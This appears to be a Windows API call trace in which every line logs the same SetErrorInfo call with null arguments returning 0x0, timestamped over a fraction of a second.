[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.897] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.898] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.899] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.900] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.901] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.902] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.903] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.905] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.906] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.908] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.909] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.916] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.916] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.916] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.917] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.918] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.919] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.920] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
